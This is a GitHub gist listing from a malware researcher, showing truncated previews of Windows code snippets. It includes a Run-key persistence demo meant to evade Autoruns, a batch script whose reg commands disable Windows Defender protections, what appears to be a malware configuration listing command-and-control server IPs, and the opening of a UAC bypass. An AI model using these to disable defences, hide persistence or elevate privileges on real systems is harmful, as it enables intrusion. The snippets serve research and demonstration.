Skip to content

Instantly share code, notes, and snippets.

@hasherezade
hasherezade / test.reg
Last active Sep 29, 2022
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more: https://twitter.com/hasherezade/status/849756054145699840)
View test.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
@hasherezade
hasherezade / main.cpp
Created Jul 17, 2021
A native way to enumerate processes (alternative to: EnumProcesses, CreateToolhelp32Snapshot - Process32First - Process32Next)
View main.cpp
#include <windows.h>
#include <iostream>
#include "ntddk.h"
bool enum_processes()
{
ULONG retLen = 0;
// check length:
@hasherezade
hasherezade / aes_crypt.cpp
Last active Aug 2, 2022
AES 128 - encrypt/decrypt using Windows Crypto API
View aes_crypt.cpp
#include <Windows.h>
#include <wincrypt.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")
#define AES_KEY_SIZE 16
#define IN_CHUNK_SIZE (AES_KEY_SIZE * 10) // a buffer must be a multiple of the key size
#define OUT_CHUNK_SIZE (IN_CHUNK_SIZE * 2) // an output buffer (for encryption) must be twice as big
//params: <input file> <output file> <is decrypt mode> <key>
View LZDecompress.cpp
#include <iostream>
#include <Windows.h>
#pragma comment(lib,"LZ32.lib")
bool decompress(LPSTR infile, LPSTR outfile)
{
INT hin, hout = 0;
OFSTRUCT ofin = { 0 };
OFSTRUCT ofout = { 0 };
@hasherezade
hasherezade / main.cpp
Last active May 27, 2022
Get PEB64 from a WOW64 process
View main.cpp
#include <Windows.h>
#include <iostream>
#include "ntdll_undoc.h"
PPEB get_default_peb()
{
#if defined(_WIN64)
return (PPEB)__readgsqword(0x60);
#else
View quick-disable-windows-defender.bat
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
View mal_unpack_runner.py
#!/usr/bin/env python3
import sys, os, subprocess
import pefile
from pathlib import Path
def mal_unp_res_to_str(returncode):
if returncode == (-1):
return "ERROR"
if returncode == 0:
View mac1_1000028.xml
<mcconf>
<ver>1000028</ver>
<gtag>mac1</gtag>
<servs>
<srv>186.103.161.204:443</srv>
<srv>163.53.206.187:443</srv>
<srv>191.7.30.30:443</srv>
<srv>46.160.165.31:443</srv>
<srv>93.99.68.140:443</srv>
<srv>190.34.158.250:443</srv>
View uac_bypass.c
void TestCopy()
{
BOOL cond = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *isrc = NULL, *idst = NULL;
BIND_OPTS3 bop;
SHELLEXECUTEINFOW shexec;
HRESULT r;
do {